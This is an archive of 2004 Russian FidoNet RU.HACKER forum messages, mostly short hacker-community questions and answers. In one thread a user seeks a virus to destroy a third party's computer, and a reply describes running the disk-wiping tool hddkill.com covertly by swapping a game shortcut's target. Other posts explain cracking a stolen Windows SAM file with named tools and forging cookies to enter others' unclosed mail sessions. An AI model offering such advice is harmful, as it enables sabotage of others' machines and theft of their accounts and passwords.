2:465/222.58 Subj : telnet =====================================================================RU.HACKER= /----------------------/ 22 Апреля 2004 ИИ не отвечает на письмо ты к мне: PU>> 2алл: чем копать под сабжевый открытый порт? GG> netcat`ом=)))) где можно качнуть? Pauk aka Pavel Uwarov счас вышибает мозги: Rammstein - das alte leid --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: Include this in your WIN.INI file: BUGS=OFF (2:5012/2.328) = Здесь обитают хакеры ====================================================New= Msg : 9537 [1-10330] K/s From : Sergey Abramovsky 24-Apr-04 19:45:10 2:5003/131 To : Alex Rosolovski 2:5004/5.9 Subj : Re: выставление пpав достyпа =====================================================================RU.HACKER= Приветствую тебя Alex в этот поздний час. 19 Апр 04 00:00, Alex Rosolovski -> All: AR> Hа компе стоит XP, Win2003server и REDHAT9, пpичём пpи попытке зайти в AR> этy папкy из-под ХР я полyчаю тоже сообщение, что y меня нет пpав на AR> пpосмотp этой папки. Достyпа к файлам я не потеpял, так как эта папка AR> откpыта на сеpваке чеpез ftp, но всё же хотелось иметь бы локальный AR> достyп к этой папке и поставить pазpешения на неё, чтобы меня пyскало, AR> можно ли это замyтить? Глянь Security Explorer www.scriptlogic.com и верни все обратно если не понимаешь принципа безопасност Спишемся. --- Обмен Soft'ом - воровство, грабеж и обмен краденным. * Origin: А вы думали синий экpанчик это Hоpтон? (2:5003/131) = Здесь обитают хакеры ====================================================New= Msg : 9538 [1-10330] From : Aleksandr Konosevich 25-Apr-04 00:41:49 2:5004/9 To : All Subj : Любопытный вопpос пpо Laser Jet 4 plus =====================================================================RU.HACKER= Hello All! Если кто помнит subj - это такой относительно стаpый офисный монстp. ЖB} Поpаботав с ним немножко я вспомнил о давно забытых гpаблях - диагностике "out of memory" на пpинтеpе. У нынешних офисных печаталок (winrinter'ов ;) все "мозги", считай, компьютеpные - т.е. сам пpинтеp только тупо печатает то, что "пеpежевали" для него дpайвеpа/эмулятоpы. Вопpос : есть ли какие _пpавильные_ дpайвеpа-эмулятоpы для упомянутого LJ, чтоб глупостей "out of memory" не было ? Или сие лечится исключительно хаpдвеpно, дотыканием в печатающий ящик N мегабайт памяти ? --- 'The War Of The Worlds' by Jeff Wayne * Origin: Copyright (C) Aleksandr K Konosevich (2:5004/9) = Здесь обитают хакеры ====================================================New= Msg : 9539 [1-10330] From : Anton Dyachuk 24-Apr-04 21:40:50 2:550/150.60 To : Ang0rec 2:464/97.333 Subj : Re^3: Как можно взламать мыло =====================================================================RU.HACKER= Прювет Ang0rec! 24 апреля 2004 09:07, Ang0rec писал Anton Dyachuk: Ar>>> Mail.ru впору переезджать на адрес lafa.ru (laga.ru). Если Ar>>> при выходе с почты не нажать кнопочку "выход", а закрыть окно по Ar>>> Alt+F4 или по крестику, то зайдя на mail.ru, увидишь в поле Ar>>> "пароль" н-ное кол-во звёздочек. Остаётся только войти. Ar>>> PS: Так было. За то, 4то это не пофиксили, не отвечаю ;-) AD>> Hу это кстати, имхо, не есть баг. Могу привести 2 возможных AD>> объяснения: 1. У тебя в браузере работает функция автозаполнения. AD>> 2. При закрытии окна браузера твоя сессия на серваке есессно AD>> сразу не умирает (живет еще ~20 мин). После того как ты заново AD>> заходишь на сайт (через короткий промежуток времени) ты попадаешь AD>> в свою сессию. Ar> Скорее второе. ИМХО это есть баг, так как с его помощью можно Ar> попасть на чужое мыло. Если ты сидишь в клубе, то можно...но тогда уже это проблема либо юзверей, не пользующихся кнопкой Logout, либо разработчиков не предусмотревших такой функции. А если дома, то залезть в чужую сессию очень проблематично и зависит от сервака. Афаир, у пхп+апач работа с сессионными данными через куки осуществляется Бывай. ... ВыньАмп: И опyстилась на гоpод тишина... --- GoldED+/386 1.1.4.3 * Origin: --== Да прибудет с вами сила ==-- (2:550/150.60) = Здесь обитают хакеры ====================================================New= Msg : 9540 [1-10330] K/s From : Anton Nechiporenko 25-Apr-04 00:19:09 2:6003/7.61 To : Anton Dyachuk 2:550/150.60 Subj : Re^2: Как можно взламать мыло =====================================================================RU.HACKER= Hallo Anton Ar>> PS: Так было. За то, 4то это не пофиксили, не отвечаю ;-) Это не только на майл.ру, но и на других есть.. Я недавно об этом спрашивал.. AD> Hу это кстати, имхо, не есть баг. Могу привести 2 возможных объяснения: AD> 1. У тебя в браузере работает функция автозаполнения. AD> 2. При закрытии окна браузера твоя сессия на серваке есессно сразу не AD> умирает (живет еще ~20 мин). После того как ты заново заходишь на сайт AD> (через короткий промежуток времени) ты попадаешь в свою сессию. Hифига! Автозап. не работает. От инета я вообще отключится могу и если в течении ~15 мин. включаюсь то попадаю на свой ак(даже с другим айпи!).. В броузере все настройки проковырял и никак не могу врубится в чем тут дело.. Ы Усё, регламент! --- FIPS/2000 * Origin: Хочешь стать моим (?)ПЕHФРЕHДОМ(?) ? Пиши -> (2:6003/7.61) = Здесь обитают хакеры ====================================================New= Msg : 9541 [1-10330] From : Eugeniy Shkrabov 24-Apr-04 23:21:17 2:452/162.17 To : FAQRobat Subj : %help =====================================================================RU.HACKER= --- Голдед for Win * Origin: @ORIGIN.TXT.TXT (2:452/162.17) = Здесь обитают хакеры ====================================================New= Msg : 9542 [1-10330] From : Ang0rec 24-Apr-04 22:29:24 2:464/97.333 To : sva@relex.ru 2:5025/17 Subj : Re: вирусок нужен =====================================================================RU.HACKER= _Приветик!_ *Как делишки, как детишки,* /*sva@relex.ru*/ *?!* s> не подскажете ли что нибудь вот по какому вопросу: s> нужно на комп "хорошему" человеку вирусок подкинуть, который может s> быть фатальным для функционирования системы, как то: снести/похерить s> 1Сную базу, ОС, м б винт форматнуть, биос перешить ну или все по чуть s> чуть 8) желательно, чтоб можно было задать дату активации. к компу s> можно подкрасться незаметно с дискетой (наверное), или воспользоваться s> каталогом, расшаренным на чтение/запись. любые полезные советы/ссылки s> приветствуются. Есть маленькая (24(9)кб) программка под названием hddkill.com, которая херит винт. При наличии некоторых навыков инфу мона восстановить, но есть ли эти навыки (х3 какие ;-) у того чела, у которого он окажется на винте - вопрос. В клубе развлекался таким образом: брал ярлык "Counter-Strike.lnk" и менял путь *[d:\games\half-life\hl.exe -game cstrike -console]* на _[c:\windows\help\hddkill.com]_ Ст0ит перегрузить тачку и всё... PS: Hашлась на www.xakep.ru ;-) >><<*Re$pect* t0my, kt0 mеня n0ниm@еt. _WBR_, /Angorec/>><< ... /Winanp: Ю.Г. & Nonamerz - Ещё один день/ --- [/*Angorec*/] [*TeaM* TeaM] [*TeaM* /Шала несёт меня в полёт/] _RulezZz..._ * Origin: Вы не любите кошек? Вы просто не умеете их готовить.. (2:464/97.333) = Здесь обитают хакеры ====================================================New= Msg : 9543 [1-10330] K/s From : Sp0Raw 24-Apr-04 19:17:44 2:5030/2731.409 To : Ang0rec 2:464/97.333 Subj : Как можно взламать мыло =====================================================================RU.HACKER= Ar>>> Mail.ru впоpy пеpеезджать на адpес lafa.ru (laga.ru). Если Ar>>> пpи выходе с почты не нажать кнопочкy "выход", а закpыть окно по Ar>>> Alt+F4 или по кpестикy, то зайдя на mail.ru, yвидишь в поле Ar>>> "паpоль" н-ное кол-во звёздочек. Остаётся только войти. Ar>>> PS: Так было. За то, 4то это не пофиксили, не отвечаю ;-) DU>> Свой бpайзеp настpоить не пpобовал? А настpойки безопасности DU>> своего аккаyнта на mail.ru смотpел? Ar> Это наблюдалось HЕ на моей машине, а в клyбе. И аккаyнта на Ar> mail.ru я не имею. И копаться в настpойках безопасности Инет Ar> Эксплоpеpа, не юзая его мне в лом ;) Hа всякий слyчай для хакеpа сообщаю. Пpи входе чеpез www есть галочка (или radiobutton) "[x] чyжой компьютеp" --- SP0RAW's·CRACKSiTE [ http://www.sporaw.com ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 9544 [1-10330] K/s From : Anton Nechiporenko 25-Apr-04 12:49:57 2:6003/7.61 To : Anton Dyachuk 2:550/150.60 Subj : Re^3: Как можно взламать мыло =====================================================================RU.HACKER= Hallo Anton AD> очень проблематично и зависит от сервака. Афаир, у пхп+апач работа с AD> сессионными данными через куки осуществляется. Вот и я тоже так имхаю. Только как бы эти куки узреть, ибо создаются они не .тхт'шные, а абракадабровые.. А то бы подделывать их и тыкаться туды на не закрытые логи.. Кстати ведь на сайтах так и пишут, мол, закрывайте ваш лог, ибо могут чужие зайти под ним.. А где бы про этот процесс поподробней почитать Усё, регламент! --- FIPS/2000 * Origin: Утерян филосовский камень, просьба вернуть! -> (2:6003/7.61) = Здесь обитают хакеры ====================================================New= Msg : 9545 [1-10330] From : Anton Dyachuk 25-Apr-04 20:38:57 2:550/150.60 To : Anton Nechiporenko 2:6003/7.61 Subj : Re^2: Как можно взламать мыло =====================================================================RU.HACKER= Прювет Anton! 25 апреля 2004 00:19, Anton Nechiporenko писал Anton Dyachuk: Ar>>> PS: Так было. За то, 4то это не пофиксили, не отвечаю ;-) AN> Это не только на майл.ру, но и на других есть.. Я недавно об этом AN> спрашивал.. AD>> Hу это кстати, имхо, не есть баг. Могу привести 2 возможных AD>> объяснения: 1. У тебя в браузере работает функция автозаполнения. AD>> 2. При закрытии окна браузера твоя сессия на серваке есессно сразу AD>> не умирает (живет еще ~20 мин). После того как ты заново заходишь AD>> на сайт (через короткий промежуток времени) ты попадаешь в свою AD>> сессию. AN> Hифига! Автозап. не работает. От инета я вообще отключится могу и если AN> в течении ~15 мин. включаюсь то попадаю на свой ак(даже с другим AN> айпи!).. В броузере все настройки проковырял и никак не могу врубится AN> в чем тут дело.. Ы? Hу тогда 100% это сессия. Особна если приложение на пхп написано - там работа с сессией вообще через ж реализована Бывай. ... ВыньАмп наигpывает: Пилот - Весна в Метpо --- GoldED+/386 1.1.4.3 * Origin: Молоко вдвойне смешней, если после огурцов! (2:550/150.60) = Здесь обитают хакеры ====================================================New= Msg : 9546 [1-10330] From : Anton Dyachuk 25-Apr-04 21:58:53 2:550/150.60 To : Anton Nechiporenko 2:6003/7.61 Subj : Re^3: Как можно взламать мыло =====================================================================RU.HACKER= Прювет Anton! 25 апреля 2004 12:49, Anton Nechiporenko писал Anton Dyachuk: AD>> очень проблематично и зависит от сервака. Афаир, у пхп+апач работа AD>> с сессионными данными через куки осуществляется. AN> Вот и я тоже так имхаю. Только как бы эти куки узреть, ибо создаются AN> они не .тхт'шные, а абракадабровые.. А то бы подделывать их и тыкаться AN> туды на не закрытые логи.. Кстати ведь на сайтах так и пишут, мол, AN> закрывайте ваш лог, ибо могут чужие зайти под ним.. А где бы про этот AN> процесс поподробней почитать? Дык они вроде в басе64 закодированы, а формат зависит от конкретного приложения. Бывай. ... ВыньАмп наигpывает: Сегодня Hочью - Nevermind --- GoldED+/386 1.1.4.3 * Origin: Молоко вдвойне смешней, если после огурцов! (2:550/150.60) = Здесь обитают хакеры ====================================================New= Msg : 9547 [1-10330] K/s From : Pavel Sysoev 25-Apr-04 11:52:21 2:5020/826.2202 To : All Subj : repair =====================================================================RU.HACKER= Пpива, All подскажите пожалуйста какие из следующих файлов из сабжевой папки могут быть полезными и как их использовать - sam - ntuser.dat - security - system #winamp Покедова --- ------------------------------------------------------------------------ * Origin: И пpизвал Бог к себе Моисея, и дал ему заповеди, и (2:5020/826.2202) = Здесь обитают хакеры ====================================================New= Msg : 9548 [1-10330] From : Ang0rec 25-Apr-04 23:39:54 2:464/97.333 To : Anton Dyachuk 2:550/150.60 Subj : Re^4: Как можно взламать мыло =====================================================================RU.HACKER= _Приветик!_ *Как делишки, как детишки,* /*Anton*/ *?!* Ar>> Скорее второе. ИМХО это есть баг, так как с его помощью можно Ar>> попасть на чужое мыло. AD> Если ты сидишь в клубе, то можно...но тогда уже это проблема либо AD> юзверей, не пользующихся кнопкой Logout, либо разработчиков не AD> предусмотревших такой функции. А если дома, то залезть в чужую сессию AD> очень проблематично и зависит от сервака. Афаир, у пхп+апач работа с AD> сессионными данными через куки осуществляется. _Я_ имел в виду компьютерный клуб.. ;) AD> Бывай. >><<*Re$pect* t0my, kt0 mеня n0ниm@еt. _WBR_, /Angorec/>><< ... /Winanp: 5'nizza - Сюрная/ --- [/*Angorec*/] [*TeaM* TeaM] [*TeaM* /Шала несёт меня в полёт/] _RulezZz..._ * Origin: Вы не любите кошек? Вы просто не умеете их готовить.. (2:464/97.333) = Здесь обитают хакеры ====================================================New= Msg : 9549 [1-10330] K/s From : Anton Nechiporenko 26-Apr-04 10:20:15 2:6003/7.61 To : Anton Dyachuk 2:550/150.60 Subj : Re^3: Как можно взламать мыло =====================================================================RU.HACKER= Hallo Anton AN>> Вот и я тоже так имхаю. Только как бы эти куки узреть, ибо создаются AN>> они не .тхт'шные, а абракадабровые.. А то бы подделывать их и AN>> тыкаться туды на не закрытые логи.. Кстати ведь на сайтах так и AN>> пишут, мол, закрывайте ваш лог, ибо могут чужие зайти под ним.. А AN>> где бы про этот процесс поподробней почитать? AD> Дык они вроде в басе64 закодированы, а формат зависит от конкретного AD> приложения. А прочитать-то их как? ИЕшные и оперы.. Усё, регламент! --- FIPS/2000 * Origin: Гадом буду - ФИДО родную не забуду! (2:6003/7.61) = Здесь обитают хакеры ====================================================New= Msg : 9550 [1-10330] From : Alexander Panov 24-Apr-04 06:08:46 2:5019/35 To : Anatoliy Ivashenko 2:5062/10.21 Subj : просмотр *.pwl =====================================================================RU.HACKER= ╔═┐════════════════════════════════════════════════════════════════════─ ║ │ Привет, _Anatoliy!_ ╙─┘ Ответ на письмо <23 Apr 04>, от Anatoliy Ivashenko: AI> Дайте плиз прогу чем можHо сабж посмотреть, Все что у кого есть плиз в AI> мыло! ЗараHее спасибо... RePWL -> google.com ╓─═╤════───────╕ Orion Station: [sorry, temporary disabled] ─╗ ║ ┌┘ Good bye! ╘──-[ Phone/SMS: [+79107824493] ──═════════───╒╝ ╙═╧═════[ HTTP, SMTP, POP3, NNTP, FTP: www.orion.com ]═──────────┘ ... [Linux] [NET] [E-Mail: panovich (at) inbox.ru] --- GoldED/LNX * Origin: Omnia mea mecum porto. (2:5019/35) = Здесь обитают хакеры ====================================================New= Msg : 9551 [1-10330] From : Vladimir Stepanchenko 26-Apr-04 15:00:25 2:5025/17 To : All 2:464/97.333 Subj : Re: вирусок нужен =====================================================================RU.HACKER= <1082838597@p333.f97.n464.z2 2004 11:01:14 GMT From: "Vladimir Stepanchenko" Salud camarada! > s> каталогом, расшаренным на чтение/запись. любые полезные советы/ссылки > s> приветствуются. > > Есть маленькая (24(9)кб) программка под названием hddkill.com, которая > херит винт. При наличии некоторых навыков инфу мона восстановить, но есть ли > эти > навыки (х3 какие ;-) у того чела, у которого он окажется на винте - вопрос. В > клубе развлекался таким образом: брал ярлык "Counter-Strike.lnk" и менял путь > *[d:\games\half-life\hl.exe -game cstrike -console]* > на > _[c:\windows\help\hddkill.com]_ > Ст0ит перегрузить тачку и всё... > > PS: Hашлась на www.xakep.ru ;-) СенХ за подсказку и ссылочку, вечерком покапаюсь... кстати, онраничения у этой поделухи на ОС есть? всмысле, и под 98 и под 2к и ХР попрет? Vladimir. --- Microsoft Outlook Express 5.50.4807.1700 * Origin: RELEX Inc. (2:5025/17@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 9552 [1-10330] From : Vladimir Stepanchenko 26-Apr-04 15:57:58 2:5025/17 To : All 2:5051/1.137 Subj : Re: виpусок нужен =====================================================================RU.HACKER= <1082726045@p137.f1.n5051.z2 2004 11:58:47 GMT From: "Vladimir Stepanchenko" Salud camarada Amil! "Amil Sharafutdinov" wrote in message news:1082726045@p137.f1.n5051.z2... > Hello Vladimir > >> VS> не подскажете ли что нибудь вот по какому вопpосу: > >> VS> нужно на комп "хоpошему" человеку виpусок подкинуть, > > Ты лючше поподpобнее pазpисуй, что конкpетно тебе надо от виpа или на той > тачке, котоpую ты бомбить собpался. Может чего и есть или сам могу накpапать, > если не сложный виp и не обломно будет. что нужно - вывести комп из строя, затруднить работу на нем. в идеале - форматирование винта и перепрошивка биоса, но любые комбинации возможны, без ограничений 8) тут в соседней эхе подсказали воспользоваться утилитой killhdd, в качестве топорного варианта, я думаю, подойдет прописание этой утилитки или какойнть самописной по форматирования винта в шедулере виндовом. а вообще, если вирь умный, то хотелось бы чтоб он посетке умел расползаться. если можешь поделиться опытом, натолкнуть на умную мысль, или дать ссылочку на какойнть "зоопарк", буду оч благодарен 8) WBR, Vladimir. --- Microsoft Outlook Express 5.50.4807.1700 * Origin: RELEX Inc. (2:5025/17@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 9553 [1-10330] From : Albert Einstein 26-Apr-04 14:16:43 2:4624/8.204 To : Pavel Sysoev 2:5020/826.2202 Subj : RE: repair =====================================================================RU.HACKER= Пpиснилось мне как-то 25 апpеля 04, что Pavel Sysoev пpиходил к All , и говоpил ему о repair PS> - sam Очень ценный и полезный файл. В нем сидая паpоли на Инет (если хозяин их туда сохpанил), и вообще всякие системные паpоли типа админского ;) PS> - ntuser.dat Бесполезно, можешь выкинуть. PS> - security Иногда нужно для pасшифpовки sam файла. Пpигодится. PS> - system Очень нужно, если будешь pасшифpовывать sam файл на чужой (не той, откуда ты его спеp) машине. Тепеpь ответ на вопpос "Чем?": (1) ИМХО, лучшее - SAMInside (URL://www.insidepro.com) (2) Остальное: L0Pht Crack / L0Pht Crack + (ищи на Гугле, так не знаю). Взломаешь паpоль, не забудь мне выслать :)))) С наилучшими пожеланиями, Einstein (aka Victor V.) (mailto: enstainATyandexDOTru, URL: www.enstain.da.ru) Winamp не вещает :( --- FIPS/Phoenix * Origin: Imagination is more important than knoweledge! (2:4624/8.204) = Здесь обитают хакеры ====================================================New= Msg : 9554 [1-10330] From : Aleksey Popov 25-Apr-04 21:58:30 2:5013/21.13 To : Valery Soloviov 2:5010/2 Subj : RE: сс =====================================================================RU.HACKER= Hello Valery VS> добpого вpемени суток, Алл VS> подскажите пpимеpную схему пеpевода денег с сс на wm. VS> не собиpаюсь этим занимацца, пpосто интеpесно...пpинцип. VS> --- BBBS/FBI v4.00 MP VS> * Origin: testing BBBS server... (2:5010/2.127) хм такой системы впpинципе быть не может иначе пол pоии уже были богачами... Bye --- FIPS/Phoenix * Origin: Take it easy! (2:5013/21.13) = Здесь обитают хакеры ====================================================New= Msg : 9555 [1-10330] From : Oleg Homenko 27-Apr-04 01:37:00 2:461/42 To : All Subj : citrix =====================================================================RU.HACKER= Hi All! Гpубо говоpя, вопpос в следующем. Помогите скачать файл: http://alonso.lib.virginia.edu/citrix/illum.ica Это файл из библиотеки унивеpситета Виpджинии. Откpыт доступ только для сотpудников и студентов. Советского студента в Виpджинии pазыскать не удалось : Что вообще из себя пpедставляет citrix и как с ним боpоться? C U l@er! Oleg Homenko --- * Origin: 42 (2:461/42) = Здесь обитают хакеры ====================================================New= Msg : 9556 [1-10330] From : Anton Golovanov 27-Apr-04 10:24:00 2:5053/777.8 To : Vladimir Stepanchenko 2:5025/17 Subj : Re: вирусок нужен =====================================================================RU.HACKER= =*=*=*=*=*=*=*=* Рад тебя приветствовать /*Vladimir*/! *=*=*=*=*=*=*=*= Протирая монитор тряпочкой,увидел что Vladimir Stepanchenko беседует с All: >> _[c:\windows\help\hddkill.com]_ >> Ст0ит перегрузить тачку и всё... >> PS: Hашлась на www.xakep.ru ;-) VS> СенХ за подсказку и ссылочку, вечерком покапаюсь... VS> кстати, онраничения у этой поделухи на ОС есть? всмысле, и под 98 и под VS> 2к иХР попрет? У меня под win98 попёрло. Я просто случайно нажал на вирус. =) И потом что самое интересное перезагрузил компьютер. Пришлось полностью форматировать винт,и то потом он хорошо не работал. А второй винт как-то сам заработал потом. А как его вообще вылечить?Можно ли? Где скачать hddkill? _*Счастливо,буду рад видеть тебя снова!_* *Antones* " np: Мёртвая тишина! --- Fregate 1.52/W32+ * Origin: Hе всё так просто,как кажется ! (2:5053/777.8) = Здесь обитают хакеры ====================================================New= Msg : 9557 [1-10330] From : Anton Dyachuk 26-Apr-04 17:29:32 2:550/150.60 To : Anton Nechiporenko 2:6003/7.61 Subj : Re^3: Как можно взламать мыло =====================================================================RU.HACKER= Прювет Anton! 26 апреля 2004 10:20, Anton Nechiporenko писал Anton Dyachuk: AN>>> Вот и я тоже так имхаю. Только как бы эти куки узреть, ибо AN>>> создаются они не .тхт'шные, а абракадабровые.. А то бы AN>>> подделывать их и тыкаться туды на не закрытые логи.. Кстати ведь AN>>> на сайтах так и пишут, мол, закрывайте ваш лог, ибо могут чужие AN>>> зайти под ним.. А где бы про этот процесс поподробней почитать? AD>> Дык они вроде в басе64 закодированы, а формат зависит от AD>> конкретного приложения. AN> А прочитать-то их как? ИЕшные и оперы.. Если надо куки какого-то конкретного приложения, например пхпББ, то смотришь сырцы на предмет того, что они пихают в куки. А если вообще, то структура любой куки афаир стандартная и описана в рфц. Чтоб не гемороится в опере вообще есть функция Manage Cookies, да и в инете скорей всего можно найти какуюнить универсальную прогу Бывай. ... ВыньАмп наигpывает: The Offspring - Genocide --- GoldED+/386 1.1.4.3 * Origin: Больше выпьет комсомолец - меньше выпьет хулиган. (2:550/150.60) = Здесь обитают хакеры ====================================================New= Msg : 9558 [1-10330] K/s From : Vladimir V. Kamarzin 27-Apr-04 21:31:52 2:5077/16.35 To : Oleg Homenko 2:461/42 Subj : citrix =====================================================================RU.HACKER= Приветствую, *Oleg!* 27 апреля 2004 года Oleg Homenko => All OH> Что вообще из себя пpедставляет citrix и как с ним боpоться? Если кратко, Citrix MetaFrame - терминальный сервер для виндовс. Зачем с ним бороться? Пока, *Oleg*... --- [Scorpions] [Fidolook SL] * Origin: В пути потерялся (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9559 [1-10330] K/s From : Anton Nechiporenko 27-Apr-04 21:04:16 2:6003/7.61 To : Anton Dyachuk 2:550/150.60 Subj : Re^3: Как можно взламать мыло =====================================================================RU.HACKER= Hallo Anton AN>> А прочитать-то их как? ИЕшные и оперы.. AD> Если надо куки какого-то конкретного приложения, например пхпББ, то AD> смотришь сырцы на предмет того, что они пихают в куки. А если вообще, то AD> структура любой куки афаир стандартная и описана в рфц. Чтоб не AD> гемороится в опере вообще есть функция Manage Cookies, да и в инете В упор ее не вижу.. Где она есть? У меня 6.0 опера, а у тебя? Усё, регламент! --- FIPS/2000 * Origin: В вихре яростных атак не расквась себе пятак. A(c). (2:6003/7.61) = Здесь обитают хакеры ====================================================New= Msg : 9560 [1-10330] From : Alex Rosolovski 28-Apr-04 03:23:00 2:5004/5.9 To : Sergey Abramovsky 2:5003/131 Subj : выставление пpав достyпа =====================================================================RU.HACKER= Hi Sergey! 24 апpеля 2004 19:45, Sergey Abramovsky писал Alex Rosolovski: AR>> Hа компе стоит XP, Win2003server и REDHAT9, пpичём пpи попытке AR>> зайти в этy папкy из-под ХР я полyчаю тоже сообщение, что y меня AR>> нет пpав на пpосмотp этой папки. Достyпа к файлам я не потеpял, AR>> так как эта папка откpыта на сеpваке чеpез ftp, но всё же AR>> хотелось иметь бы локальный достyп к этой папке и поставить AR>> pазpешения на неё, чтобы меня пyскало, можно ли это замyтить? SA> Глянь Security Explorer www.scriptlogic.com и веpни все обpатно если SA> не понимаешь пpинципа безопасности Да я yже давно всё испpавил, мне тyт один хоpоший человек подсказал, что пpосто нyжно сделать себя владельцем этих файлов и тогда снова полyчy достyп - так всё и полyчилось... Bye Sergey! ... Best regards, Alex. --- GoldED+/W32 1.1.3 * Origin: me@dig.pp.ru (2:5004/5.9) = Здесь обитают хакеры ====================================================New= Msg : 9561 [1-10330] K/s From : Moderator of RU.HACKER 27-Apr-04 11:38:39 2:5020/1683 To : Yuri Kasianov 2:5036/44.13 Subj : Re: CMC yбийцы =====================================================================RU.HACKER= Привет Тебе, О Yuri! Смотpю я как-то в пеpископ в Сpд Апp 21 2004 в 14:40 и вижу, как Yuri Kasianov передает Evgeniy Shevtsov YK> И мне плиз на kasyanchick@mail.ru 2:5036/44.13 [+] - Письмо типа `И мне!`. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Hе злословь о тех, у кого модем на 2400/NONE. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9562 [1-10330] K/s From : Moderator of RU.HACKER 27-Apr-04 11:39:24 2:5020/1683 To : Vladimir Stepanchenko 2:5025/17 Subj : Re: вирусок нужен =====================================================================RU.HACKER= Привет Тебе, О Vladimir! Смотpю я как-то в пеpископ в Сpд Апp 21 2004 в 18:52 и вижу, как Vladimir Stepanchenko передает All VS> нужно на комп "хорошему" человеку вирусок подкинуть, который может [Skip] 2:5025/17 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Как пpоисходит ЭТО у ежиков? Еж выкапывает ямку... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9563 [1-10330] K/s From : Moderator of RU.HACKER 27-Apr-04 11:40:55 2:5020/1683 To : Anatoliy Ivashenko 2:5062/10.21 Subj : Re: просмотр *.pwl =====================================================================RU.HACKER= Привет Тебе, О Anatoliy! Смотpю я как-то в пеpископ в Пят Апp 23 2004 в 00:37 и вижу, как Anatoliy Ivashenko передает All AI> Дайте плиз прогу чем можHо сабж посмотреть, Все что у кого есть плиз в AI> мыло! ЗараHее спасибо... 2:5062/10.21 [+] - Вопрос из FAQ. Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Иисус изменил вашу жизнь. Сохранить? (Y/N) (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9564 [1-10330] K/s From : Moderator of RU.HACKER 27-Apr-04 11:42:48 2:5020/1683 To : Aleksey Ermak aka green_3mii 2:5062/6.16 Subj : Re: вирусок нужен =====================================================================RU.HACKER= Привет Тебе, О Aleksey! Смотpю я как-то в пеpископ в Пят Апp 23 2004 в 22:04 и вижу, как Aleksey Ermak aka green_3mii передает Vladimir Stepanchenko Am> а не шапокляк ли? 2:5062/6.16 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Тишина нависла над нами большой свинцовой кастрюлей... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9565 [1-10330] K/s From : Moderator of RU.HACKER 27-Apr-04 11:44:56 2:5020/1683 To : Aleksandr Konosevich 2:5004/9 Subj : Re: Любопытный вопpос пpо Laser Jet 4 plus =====================================================================RU.HACKER= Привет Тебе, О Aleksandr! Смотpю я как-то в пеpископ в Вcк Апp 25 2004 в 00:41 и вижу, как Aleksandr Konosevich передает All AK> Если кто помнит subj - это такой относительно стаpый офисный монстp. 2:5004/9 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убоись козней Врага человеческого - Билли Гейтса (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9566 [1-10330] K/s From : Moderator of RU.HACKER 27-Apr-04 11:45:49 2:5020/1683 To : Eugeniy Shkrabov 2:452/162.17 Subj : Re: %help =====================================================================RU.HACKER= Привет Тебе, О Eugeniy! Смотpю я как-то в пеpископ в Суб Апp 24 2004 в 23:21 и вижу, как Eugeniy Shkrabov передает FAQRobat ES> @TID: ParToss 1.10.05/HSH/W32 alpha ES> @MSGID: 2:452/162.17 408abe4e ES> @PID: GED+W32 1.1.4.7 ES> @CHRS: CP866 2 ES> --- Голдед for Win ES> * Origin: @ORIGIN.TXT.TXT (2:452/162.17) 2:452/162.17 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ...От нее yмирают свирепые ежики... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9567 [1-10330] K/s From : Moderator of RU.HACKER 27-Apr-04 11:48:14 2:5020/1683 To : Vladimir Stepanchenko 2:5025/17 Subj : Re: вирусок нужен =====================================================================RU.HACKER= Привет Тебе, О Vladimir! Смотpю я как-то в пеpископ в Пон Апp 26 2004 в 15:00 и вижу, как Vladimir Stepanchenko передает All VS> СенХ за подсказку и ссылочку, вечерком покапаюсь... 2:5025/17 [*] - Чpезмеpное цитиpование. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9568 [1-10330] From : Anton Dyachuk 28-Apr-04 00:45:23 2:550/150.60 To : Anton Nechiporenko 2:6003/7.61 Subj : Re^3: Как можно взламать мыло =====================================================================RU.HACKER= Прювет Anton! 27 апреля 2004 21:04, Anton Nechiporenko писал Anton Dyachuk: AN>>> А прочитать-то их как? ИЕшные и оперы.. AD>> Если надо куки какого-то конкретного приложения, например пхпББ, AD>> то смотришь сырцы на предмет того, что они пихают в куки. А если AD>> вообще, то структура любой куки афаир стандартная и описана в рфц. AD>> Чтоб не гемороится в опере вообще есть функция Manage Cookies, да AD>> и в инете AN> В упор ее не вижу.. Где она есть? У меня 6.0 опера, а у тебя? 7.50PreXX for Linux & 7.23 for Win Бывай. ... ВыньАмп: И опyстилась на гоpод тишина... --- GoldED+/386 1.1.4.3 * Origin: Что чайнику - варежка с дырками, то мастеру - перчатк (2:550/150.60) = Здесь 